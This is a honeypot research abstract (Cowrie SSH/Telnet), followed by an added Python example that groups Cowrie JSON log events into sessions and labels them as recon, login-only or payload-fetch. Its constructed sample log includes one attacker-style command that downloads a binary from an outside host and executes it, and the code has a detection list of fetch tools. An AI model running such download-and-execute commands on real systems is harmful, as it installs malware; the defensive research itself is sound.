Enhancing SSH/Telnet Honeypot for Attack Classification and Malware Research
Michele Castellaneta (co-first author; internal co-supervisor)
Abraham Gebrehiwot (co-first author; internal co-supervisor)
Filippo Maria Lauria (co-first author; internal co-supervisor)
Claudio Porta (co-first author; internal co-supervisor)
2026
Abstract
Honeypots are widely used to detect and analyze attack activity, including login attempts, command execution and code injection. How much malware a honeypot collects depends on how convincingly it replicates a real device and on whether an attack is generic or targeted at a specific device model or class. This work improves the effectiveness of the Cowrie SSH/Telnet honeypot in order to raise data quality and support more advanced attack analysis. We implemented a logging pipeline for real-time log collection, normalization and visualization. Despite a high attack volume, many sessions ended early because bots recognized the honeypot. To reduce such detection, we developed a modified honeypot replica with altered system files and access controls based on realistic username and password lists. Multiple configurations were tested to assess their effect on attacker behavior. Our results highlight how difficult it is to evade fingerprinting by automated attackers, but show that greater honeypot realism yields more meaningful data for cybersecurity research: it enables attacks targeting specific devices to be filtered and classified, and it provides a starting dataset that can be refined further with machine learning techniques. Future work will focus on further improving honeypot stealth and customization and on expanding malware analysis capabilities.
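The abstract describes two pieces that a practitioner would want to see concretely: normalizing Cowrie's logs per session, and separating the short "probe and leave" sessions of bots that spotted the honeypot from sessions that actually delivered a payload (the latter being the ones that can be filtered by targeted device class). The following Python is an added example written for this page, not code from the thesis or from the Cowrie project. It reads Cowrie's native JSON log format (one event per line, with the real event names cowrie.session.connect, cowrie.login.success, cowrie.login.failed, cowrie.command.input, cowrie.session.file_download and cowrie.session.closed) and assigns each session a label. The recon/fetch token lists, the label names and the architecture hints are this example's own heuristics, and the sample log lines are constructed rather than captured.

```python
"""Session-level normalization and classification of Cowrie JSON logs.

Added example, not the paper's or Cowrie's code. Event and field names
(eventid, session, src_ip, protocol, username, password, input, url,
duration) follow Cowrie's JSON output; token lists, labels and the
sample lines are assumptions of this example.
"""
import json
import re

# First words of commands bots typically run to fingerprint a host before
# deciding whether to go on (heuristic list, an assumption of this example).
RECON_TOKENS = {"cat", "uname", "nproc", "ls", "echo", "enable", "system", "shell",
                "sh", "which", "lscpu", "dmesg", "whoami", "id", "free", "df", "ps",
                "cd", "grep", "wc", "head", "tail", "busybox", "/bin/busybox"}
# Tokens that indicate an attempt to pull a payload onto the box.
FETCH_TOKENS = {"wget", "curl", "tftp", "ftpget"}
# File-name substrings hinting at the targeted CPU architecture; longer
# names come first so that "x86_64" is not reported as "x86".
ARCH_HINTS = ("x86_64", "aarch64", "mipsel", "mips64", "mips", "arm7", "arm6",
              "arm5", "arm", "x86", "i686", "sh4", "ppc", "m68k", "sparc")

# Constructed sample of cowrie.json lines (not captured traffic).
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","session":"a1","src_ip":"203.0.113.10","protocol":"ssh","timestamp":"2025-01-01T00:00:00Z"}
{"eventid":"cowrie.login.success","session":"a1","src_ip":"203.0.113.10","username":"root","password":"123456","timestamp":"2025-01-01T00:00:01Z"}
{"eventid":"cowrie.command.input","session":"a1","src_ip":"203.0.113.10","input":"cat /proc/cpuinfo | grep name | wc -l","timestamp":"2025-01-01T00:00:02Z"}
{"eventid":"cowrie.session.closed","session":"a1","src_ip":"203.0.113.10","duration":2.4,"timestamp":"2025-01-01T00:00:03Z"}
{"eventid":"cowrie.session.connect","session":"b2","src_ip":"198.51.100.7","protocol":"telnet","timestamp":"2025-01-01T00:01:00Z"}
{"eventid":"cowrie.login.success","session":"b2","src_ip":"198.51.100.7","username":"admin","password":"admin","timestamp":"2025-01-01T00:01:01Z"}
{"eventid":"cowrie.command.input","session":"b2","src_ip":"198.51.100.7","input":"cd /tmp; wget http://198.51.100.7/bins/x86; chmod +x x86; ./x86","timestamp":"2025-01-01T00:01:02Z"}
{"eventid":"cowrie.session.file_download","session":"b2","src_ip":"198.51.100.7","url":"http://198.51.100.7/bins/x86","timestamp":"2025-01-01T00:01:03Z"}
{"eventid":"cowrie.session.closed","session":"b2","src_ip":"198.51.100.7","duration":9.8,"timestamp":"2025-01-01T00:01:10Z"}
{"eventid":"cowrie.session.connect","session":"c3","src_ip":"192.0.2.5","protocol":"ssh","timestamp":"2025-01-01T00:02:00Z"}
{"eventid":"cowrie.login.failed","session":"c3","src_ip":"192.0.2.5","username":"pi","password":"raspberry","timestamp":"2025-01-01T00:02:01Z"}
{"eventid":"cowrie.session.closed","session":"c3","src_ip":"192.0.2.5","duration":1.1,"timestamp":"2025-01-01T00:02:02Z"}
"""


def parse_cowrie_json(text):
    """Return one dict per well-formed event line; skip blank or truncated lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # partial line left by log rotation or a crash
        if "eventid" in ev and "session" in ev:
            events.append(ev)
    return events


def build_sessions(events):
    """Group events by Cowrie session id into one normalized record each."""
    sessions = {}
    for ev in events:
        s = sessions.setdefault(ev["session"], {
            "src_ip": ev.get("src_ip"), "protocol": None, "login": None,
            "failed_logins": 0, "commands": [], "downloads": [], "duration": None})
        eid = ev["eventid"]
        if eid == "cowrie.session.connect":
            s["protocol"] = ev.get("protocol")
        elif eid == "cowrie.login.success":
            s["login"] = (ev.get("username"), ev.get("password"))
        elif eid == "cowrie.login.failed":
            s["failed_logins"] += 1
        elif eid == "cowrie.command.input":
            # Split compound lines (a; b && c | d) into individual commands.
            parts = re.split(r"[;&|]+", ev.get("input", ""))
            s["commands"].extend(p.strip() for p in parts if p.strip())
        elif eid == "cowrie.session.file_download":
            s["downloads"].append(ev.get("url", ""))
        elif eid == "cowrie.session.closed":
            s["duration"] = ev.get("duration")
    return sessions


def arch_hint(urls):
    """Guess the targeted architecture from a downloaded file name, if any."""
    for url in urls:
        name = url.rstrip("/").rsplit("/", 1)[-1].lower()
        for hint in ARCH_HINTS:
            if hint in name:
                return hint
    return None


def classify(s):
    """Label a normalized session (labels are this example's own, not Cowrie's)."""
    if s["login"] is None:
        return "no_login"
    words = {w for c in s["commands"] for w in c.split()}
    if s["downloads"] or words & FETCH_TOKENS:
        return "payload_fetch"
    if not s["commands"]:
        return "login_only"
    if all(c.split()[0] in RECON_TOKENS for c in s["commands"]):
        return "recon_abort"  # fingerprinted the host, then left: likely spotted the honeypot
    return "interactive"


def summarize(text):
    """Raw cowrie.json text -> {session_id: normalized record plus labels}."""
    return {sid: dict(s, category=classify(s), arch_hint=arch_hint(s["downloads"]))
            for sid, s in build_sessions(parse_cowrie_json(text)).items()}


def count_by_category(summary):
    """Per-label counts, the kind of aggregate a dashboard panel would plot."""
    counts = {}
    for rec in summary.values():
        counts[rec["category"]] = counts.get(rec["category"], 0) + 1
    return counts
```

Running `summarize(SAMPLE_LOG)` labels session a1 as `recon_abort` (logged in, ran only fingerprinting commands, left after a couple of seconds), b2 as `payload_fetch` with `arch_hint == "x86"`, and c3 as `no_login`. Comparing `count_by_category` before and after a configuration change (for instance after swapping in a realistic credential list or altered system files) gives a direct measure of whether fewer bots abort at the recon stage, which is the effect the paper's configuration experiments are meant to expose.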


